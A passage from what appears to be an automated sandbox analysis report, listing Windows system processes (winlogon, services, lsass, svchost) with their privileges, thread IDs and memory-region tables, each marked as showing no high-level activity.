| private_0x00007ff7596e3000 | 0x7ff7596e3000 | 0x7ff7596e4fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7596eb000 | 0x7ff7596eb000 | 0x7ff7596ebfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7596ee000 | 0x7ff7596ee000 | 0x7ff7596effff | Private Memory | rw |
|
|
|
- |
| winlogon.exe | 0x7ff7597d0000 | 0x7ff759862fff | Memory Mapped File | rwx |
|
|
|
- |
| usermgrcli.dll | 0x7ff8e7d10000 | 0x7ff8e7d1ffff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x7ff8e9500000 | 0x7ff8e9577fff | Memory Mapped File | rwx |
|
|
|
- |
| dwminit.dll | 0x7ff8e9660000 | 0x7ff8e9672fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x7ff8e9680000 | 0x7ff8e9715fff | Memory Mapped File | rwx |
|
|
|
- |
| uxinit.dll | 0x7ff8e9750000 | 0x7ff8e9768fff | Memory Mapped File | rwx |
|
|
|
- |
| mpr.dll | 0x7ff8e9fe0000 | 0x7ff8e9ffbfff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x7ff8ea0f0000 | 0x7ff8ea121fff | Memory Mapped File | rwx |
|
|
|
- |
| dpapi.dll | 0x7ff8ea1d0000 | 0x7ff8ea1d9fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ff8ea790000 | 0x7ff8ea79afff | Memory Mapped File | rwx |
|
|
|
- |
| winsta.dll | 0x7ff8ea820000 | 0x7ff8ea877fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7ff8ea9d0000 | 0x7ff8ea9fbfff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ff8eabd0000 | 0x7ff8eabf7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ff8eac00000 | 0x7ff8eac6afff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x7ff8eadb0000 | 0x7ff8eadc0fff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ff8eadd0000 | 0x7ff8eae19fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ff8eae30000 | 0x7ff8eae42fff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x7ff8eafb0000 | 0x7ff8eb170fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x7ff8eb7b0000 | 0x7ff8eb862fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ff8eb870000 | 0x7ff8eba4cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ff8ebdc0000 | 0x7ff8ebf0dfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7ff8ec0c0000 | 0x7ff8ec21bfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ff8ec240000 | 0x7ff8ec29afff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ff8ec450000 | 0x7ff8ec575fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ff8edbc0000 | 0x7ff8edd44fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ff8edd60000 | 0x7ff8edfdbfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ff8ee0b0000 | 0x7ff8ee14cfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7ff8ee150000 | 0x7ff8ee185fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ff8ee190000 | 0x7ff8ee235fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ff8ee2d0000 | 0x7ff8ee37cfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
Process #61: services.exe
0
0
| Information | Value |
|---|---|
| ID | #61 |
| File Name | c:\windows\system32\services.exe |
| Command Line | C:\Windows\system32\services.exe |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x1e8 |
| Parent PID | 0x198 (c:\windows\system32\wininit.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
378
0x
354
0x
350
0x
324
0x
294
0x
260
0x
238
0x
300
0x
94C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x0000005df6210000 | 0x5df6210000 | 0x5df621ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| services.exe.mui | 0x5df6220000 | 0x5df6224fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000005df6230000 | 0x5df6230000 | 0x5df6243fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000005df62d0000 | 0x5df62d0000 | 0x5df62d3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000005df62e0000 | 0x5df62e0000 | 0x5df62e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x5df62f0000 | 0x5df63adfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000005df6430000 | 0x5df6430000 | 0x5df6430fff | Private Memory | rw |
|
|
|
- |
| private_0x0000005df6460000 | 0x5df6460000 | 0x5df6466fff | Private Memory | rw |
|
|
|
- |
| private_0x0000005df6470000 | 0x5df6470000 | 0x5df64effff | Private Memory | rw |
|
|
|
- |
| private_0x0000005df6500000 | 0x5df6500000 | 0x5df65fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005df66e0000 | 0x5df66e0000 | 0x5df66e6fff | Private Memory | rw |
|
|
|
- |
| private_0x0000005df6700000 | 0x5df6700000 | 0x5df67fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005df6800000 | 0x5df6800000 | 0x5df687ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005df6880000 | 0x5df6880000 | 0x5df68fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005df6900000 | 0x5df6900000 | 0x5df697ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005df6a80000 | 0x5df6a80000 | 0x5df6afffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005df6b00000 | 0x5df6b00000 | 0x5df6b7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005df6c00000 | 0x5df6c00000 | 0x5df6cfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005df6d00000 | 0x5df6d00000 | 0x5df6d7ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ff8d0000 | 0x7df5ff8d0000 | 0x7ff5ff8cffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff79a782000 | 0x7ff79a782000 | 0x7ff79a783fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff79a786000 | 0x7ff79a786000 | 0x7ff79a787fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff79a788000 | 0x7ff79a788000 | 0x7ff79a789fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff79a78e000 | 0x7ff79a78e000 | 0x7ff79a78ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff79a790000 | 0x7ff79a790000 | 0x7ff79a88ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff79a890000 | 0x7ff79a890000 | 0x7ff79a8b2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff79a8b3000 | 0x7ff79a8b3000 | 0x7ff79a8b4fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff79a8b5000 | 0x7ff79a8b5000 | 0x7ff79a8b6fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff79a8b7000 | 0x7ff79a8b7000 | 0x7ff79a8b7fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff79a8ba000 | 0x7ff79a8ba000 | 0x7ff79a8bbfff | Private Memory | rw |
|
|
|
- |
| services.exe | 0x7ff79a960000 | 0x7ff79a9cffff | Memory Mapped File | rwx |
|
|
|
- |
| usermgrcli.dll | 0x7ff8e7d10000 | 0x7ff8e7d1ffff | Memory Mapped File | rwx |
|
|
|
- |
| authz.dll | 0x7ff8e9ec0000 | 0x7ff8e9f07fff | Memory Mapped File | rwx |
|
|
|
- |
| scesrv.dll | 0x7ff8e9f10000 | 0x7ff8e9f9dfff | Memory Mapped File | rwx |
|
|
|
- |
| srvcli.dll | 0x7ff8ea010000 | 0x7ff8ea035fff | Memory Mapped File | rwx |
|
|
|
- |
| mswsock.dll | 0x7ff8ea5c0000 | 0x7ff8ea61cfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7ff8ea9d0000 | 0x7ff8ea9fbfff | Memory Mapped File | rwx |
|
|
|
- |
| spinf.dll | 0x7ff8eab80000 | 0x7ff8eab9afff | Memory Mapped File | rwx |
|
|
|
- |
| eventaggregation.dll | 0x7ff8eaba0000 | 0x7ff8eabb9fff | Memory Mapped File | rwx |
|
|
|
- |
| dabapi.dll | 0x7ff8eabc0000 | 0x7ff8eabc7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ff8eac00000 | 0x7ff8eac6afff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ff8eae30000 | 0x7ff8eae42fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ff8eb870000 | 0x7ff8eba4cfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ff8ec240000 | 0x7ff8ec29afff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ff8ec450000 | 0x7ff8ec575fff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x7ff8ee040000 | 0x7ff8ee0a8fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ff8ee0b0000 | 0x7ff8ee14cfff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x7ff8ee250000 | 0x7ff8ee257fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ff8ee2d0000 | 0x7ff8ee37cfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
Process #62: lsass.exe
0
0
| Information | Value |
|---|---|
| ID | #62 |
| File Name | c:\windows\system32\lsass.exe |
| Command Line | C:\Windows\system32\lsass.exe |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x1f0 |
| Parent PID | 0x198 (c:\windows\system32\wininit.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeCreateTokenPrivilege, SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
43C
0x
23C
0x
22C
0x
220
0x
21C
0x
218
0x
1F4
0x
E04
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x0000000a2c3f0000 | 0xa2c3f0000 | 0xa2c3fffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000a2c400000 | 0xa2c400000 | 0xa2c400fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000a2c410000 | 0xa2c410000 | 0xa2c423fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000a2c430000 | 0xa2c430000 | 0xa2c4affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000a2c4b0000 | 0xa2c4b0000 | 0xa2c4b3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000a2c4c0000 | 0xa2c4c0000 | 0xa2c4c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000a2c4d0000 | 0xa2c4d0000 | 0xa2c4d1fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000a2c4e0000 | 0xa2c4e0000 | 0xa2c4e0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000a2c4f0000 | 0xa2c4f0000 | 0xa2c4fffff | Pagefile Backed Memory | rw |
|
|
|
- |
| lsasrv.dll.mui | 0xa2c500000 | 0xa2c50afff | Memory Mapped File | r |
|
|
|
- |
| msprivs.dll | 0xa2c510000 | 0xa2c512fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000a2c520000 | 0xa2c520000 | 0xa2c52ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000a2c530000 | 0xa2c530000 | 0xa2c536fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0xa2c540000 | 0xa2c5fdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000a2c600000 | 0xa2c600000 | 0xa2c6fffff | Private Memory | rw |
|
|
|
- |
| 5b8a3202-35dc-4437-b5d7-374f5e872415 | 0xa2c700000 | 0xa2c700fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000a2c700000 | 0xa2c700000 | 0xa2c77ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000a2c780000 | 0xa2c780000 | 0xa2c7fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000a2c800000 | 0xa2c800000 | 0xa2c87ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000a2c880000 | 0xa2c880000 | 0xa2c8fffff | Private Memory | rw |
|
|
|
- |
| c_28591.nls | 0xa2c900000 | 0xa2c910fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000a2c920000 | 0xa2c920000 | 0xa2c920fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000a2c930000 | 0xa2c930000 | 0xa2c930fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000a2c940000 | 0xa2c940000 | 0xa2c946fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000a2c950000 | 0xa2c950000 | 0xa2c951fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000a2c9d0000 | 0xa2c9d0000 | 0xa2c9d0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000a2c9e0000 | 0xa2c9e0000 | 0xa2c9e0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000a2c9f0000 | 0xa2c9f0000 | 0xa2c9f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000a2ca00000 | 0xa2ca00000 | 0xa2cafffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0xa2cb00000 | 0xa2ce36fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000a2ce40000 | 0xa2ce40000 | 0xa2cebffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000a2cec0000 | 0xa2cec0000 | 0xa2cec0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000a2ced0000 | 0xa2ced0000 | 0xa2ced0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000a2cee0000 | 0xa2cee0000 | 0xa2cee0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000a2cef0000 | 0xa2cef0000 | 0xa2cef0fff | Private Memory | rw |
|
|
|
- |
| vaultsvc.dll.mui | 0xa2cf00000 | 0xa2cf00fff | Memory Mapped File | r |
|
|
|
- |
| crypt32.dll.mui | 0xa2cf20000 | 0xa2cf29fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000a2cf80000 | 0xa2cf80000 | 0xa2cffffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000a2d080000 | 0xa2d080000 | 0xa2d17ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000a2d200000 | 0xa2d200000 | 0xa2d2fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ff5b0000 | 0x7df5ff5b0000 | 0x7ff5ff5affff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff699f4a000 | 0x7ff699f4a000 | 0x7ff699f4bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff699f4e000 | 0x7ff699f4e000 | 0x7ff699f4ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff699f50000 | 0x7ff699f50000 | 0x7ff69a04ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff69a050000 | 0x7ff69a050000 | 0x7ff69a072fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff69a075000 | 0x7ff69a075000 | 0x7ff69a076fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff69a077000 | 0x7ff69a077000 | 0x7ff69a078fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff69a079000 | 0x7ff69a079000 | 0x7ff69a07afff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff69a07b000 | 0x7ff69a07b000 | 0x7ff69a07cfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff69a07d000 | 0x7ff69a07d000 | 0x7ff69a07efff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff69a07f000 | 0x7ff69a07f000 | 0x7ff69a07ffff | Private Memory | rw |
|
|
|
- |
| lsass.exe | 0x7ff69ad30000 | 0x7ff69ad3ffff | Memory Mapped File | rwx |
|
|
|
- |
| ncryptprov.dll | 0x7ff8d7370000 | 0x7ff8d73c8fff | Memory Mapped File | rwx |
|
|
|
- |
| mskeyprotect.dll | 0x7ff8e3170000 | 0x7ff8e3183fff | Memory Mapped File | rwx |
|
|
|
- |
| dssenh.dll | 0x7ff8e52c0000 | 0x7ff8e52e7fff | Memory Mapped File | rwx |
|
|
|
- |
| ncryptsslp.dll | 0x7ff8e52f0000 | 0x7ff8e530efff | Memory Mapped File | rwx |
|
|
|
- |
| vaultsvc.dll | 0x7ff8e6e70000 | 0x7ff8e6ec2fff | Memory Mapped File | rwx |
|
|
|
- |
| fvecerts.dll | 0x7ff8e6fe0000 | 0x7ff8e6febfff | Memory Mapped File | rwx |
|
|
|
- |
| fveapi.dll | 0x7ff8e6ff0000 | 0x7ff8e70adfff | Memory Mapped File | rwx |
|
|
|
- |
| wevtapi.dll | 0x7ff8e81f0000 | 0x7ff8e8254fff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x7ff8e8460000 | 0x7ff8e846afff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x7ff8e8480000 | 0x7ff8e84b7fff | Memory Mapped File | rwx |
|
|
|
- |
| gpapi.dll | 0x7ff8e9cd0000 | 0x7ff8e9cf2fff | Memory Mapped File | rwx |
|
|
|
- |
| scecli.dll | 0x7ff8e9e70000 | 0x7ff8e9ebafff | Memory Mapped File | rwx |
|
|
|
- |
| dpapisrv.dll | 0x7ff8e9fa0000 | 0x7ff8e9fd4fff | Memory Mapped File | rwx |
|
|
|
- |
| mpr.dll | 0x7ff8e9fe0000 | 0x7ff8e9ffbfff | Memory Mapped File | rwx |
|
|
|
- |
| netutils.dll | 0x7ff8ea000000 | 0x7ff8ea00bfff | Memory Mapped File | rwx |
|
|
|
- |
| srvcli.dll | 0x7ff8ea010000 | 0x7ff8ea035fff | Memory Mapped File | rwx |
|
|
|
- |
| efslsaext.dll | 0x7ff8ea040000 | 0x7ff8ea05ffff | Memory Mapped File | rwx |
|
|
|
- |
| tbs.dll | 0x7ff8ea060000 | 0x7ff8ea06cfff | Memory Mapped File | rwx |
|
|
|
- |
| pcptpm12.dll | 0x7ff8ea070000 | 0x7ff8ea0eafff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x7ff8ea0f0000 | 0x7ff8ea121fff | Memory Mapped File | rwx |
|
|
|
- |
| pcpksp.dll | 0x7ff8ea130000 | 0x7ff8ea148fff | Memory Mapped File | rwx |
|
|
|
- |
| schannel.dll | 0x7ff8ea150000 | 0x7ff8ea1c3fff | Memory Mapped File | rwx |
|
|
|
- |
| dpapi.dll | 0x7ff8ea1d0000 | 0x7ff8ea1d9fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoftaccountcloudap.dll | 0x7ff8ea1e0000 | 0x7ff8ea224fff | Memory Mapped File | rwx |
|
|
|
- |
| cloudap.dll | 0x7ff8ea230000 | 0x7ff8ea261fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ff8ea270000 | 0x7ff8ea2a2fff | Memory Mapped File | rwx |
|
|
|
- |
| wdigest.dll | 0x7ff8ea2b0000 | 0x7ff8ea2eafff | Memory Mapped File | rwx |
|
|
|
- |
| pku2u.dll | 0x7ff8ea2f0000 | 0x7ff8ea337fff | Memory Mapped File | rwx |
|
|
|
- |
| tspkg.dll | 0x7ff8ea340000 | 0x7ff8ea35bfff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x7ff8ea360000 | 0x7ff8ea37efff | Memory Mapped File | rwx |
|
|
|
- |
| logoncli.dll | 0x7ff8ea380000 | 0x7ff8ea3bdfff | Memory Mapped File | rwx |
|
|
|
- |
| dnsapi.dll | 0x7ff8ea3c0000 | 0x7ff8ea467fff | Memory Mapped File | rwx |
|
|
|
- |
| netlogon.dll | 0x7ff8ea470000 | 0x7ff8ea541fff | Memory Mapped File | rwx |
|
|
|
- |
| ntlmshared.dll | 0x7ff8ea550000 | 0x7ff8ea55afff | Memory Mapped File | rwx |
|
|
|
- |
| msv1_0.dll | 0x7ff8ea560000 | 0x7ff8ea5befff | Memory Mapped File | rwx |
|
|
|
- |
| mswsock.dll | 0x7ff8ea5c0000 | 0x7ff8ea61cfff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ff8ea620000 | 0x7ff8ea636fff | Memory Mapped File | rwx |
|
|
|
- |
| kerbclientshared.dll | 0x7ff8ea640000 | 0x7ff8ea667fff | Memory Mapped File | rwx |
|
|
|
- |
| kerberos.dll | 0x7ff8ea670000 | 0x7ff8ea763fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptdll.dll | 0x7ff8ea770000 | 0x7ff8ea783fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ff8ea790000 | 0x7ff8ea79afff | Memory Mapped File | rwx |
|
|
|
- |
| negoexts.dll | 0x7ff8ea7a0000 | 0x7ff8ea7c8fff | Memory Mapped File | rwx |
|
|
|
- |
| joinutil.dll | 0x7ff8ea7d0000 | 0x7ff8ea7f0fff | Memory Mapped File | rwx |
|
|
|
- |
| netprovfw.dll | 0x7ff8ea800000 | 0x7ff8ea814fff | Memory Mapped File | rwx |
|
|
|
- |
| winsta.dll | 0x7ff8ea820000 | 0x7ff8ea877fff | Memory Mapped File | rwx |
|
|
|
- |
| ntasn1.dll | 0x7ff8ea880000 | 0x7ff8ea8b5fff | Memory Mapped File | rwx |
|
|
|
- |
| ncrypt.dll | 0x7ff8ea8c0000 | 0x7ff8ea8e5fff | Memory Mapped File | rwx |
|
|
|
- |
| samsrv.dll | 0x7ff8ea8f0000 | 0x7ff8ea9c5fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7ff8ea9d0000 | 0x7ff8ea9fbfff | Memory Mapped File | rwx |
|
|
|
- |
| lsasrv.dll | 0x7ff8eaa00000 | 0x7ff8eab63fff | Memory Mapped File | rwx |
|
|
|
- |
| sspisrv.dll | 0x7ff8eab70000 | 0x7ff8eab7bfff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ff8eabd0000 | 0x7ff8eabf7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ff8eac00000 | 0x7ff8eac6afff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x7ff8eadb0000 | 0x7ff8eadc0fff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ff8eadd0000 | 0x7ff8eae19fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ff8eae30000 | 0x7ff8eae42fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x7ff8eaf60000 | 0x7ff8eafa3fff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x7ff8eafb0000 | 0x7ff8eb170fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ff8eb870000 | 0x7ff8eba4cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ff8ebb30000 | 0x7ff8ebbedfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ff8ec240000 | 0x7ff8ec29afff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ff8ec450000 | 0x7ff8ec575fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ff8edd60000 | 0x7ff8edfdbfff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x7ff8ee040000 | 0x7ff8ee0a8fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ff8ee0b0000 | 0x7ff8ee14cfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ff8ee190000 | 0x7ff8ee235fff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x7ff8ee250000 | 0x7ff8ee257fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ff8ee2d0000 | 0x7ff8ee37cfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
Process #63: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #63 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\Windows\system32\svchost.exe -k DcomLaunch |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x248 |
| Parent PID | 0x1e8 (c:\windows\system32\services.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
B58
0x
A3C
0x
A5C
0x
A54
0x
BD8
0x
8A0
0x
5D0
0x
484
0x
404
0x
424
0x
244
0x
578
0x
3DC
0x
328
0x
320
0x
2D4
0x
2D0
0x
2AC
0x
2A8
0x
288
0x
270
0x
25C
0x
24C
0x
A84
0x
73C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00000082264c0000 | 0x82264c0000 | 0x82264cffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000082264d0000 | 0x82264d0000 | 0x82264d4fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000082264e0000 | 0x82264e0000 | 0x82264f3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000008226500000 | 0x8226500000 | 0x822657ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000008226580000 | 0x8226580000 | 0x8226583fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000008226590000 | 0x8226590000 | 0x8226590fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000082265a0000 | 0x82265a0000 | 0x82265a1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000082265b0000 | 0x82265b0000 | 0x822662ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000008226630000 | 0x8226630000 | 0x8226630fff | Pagefile Backed Memory | rw |
|
|
|
- |
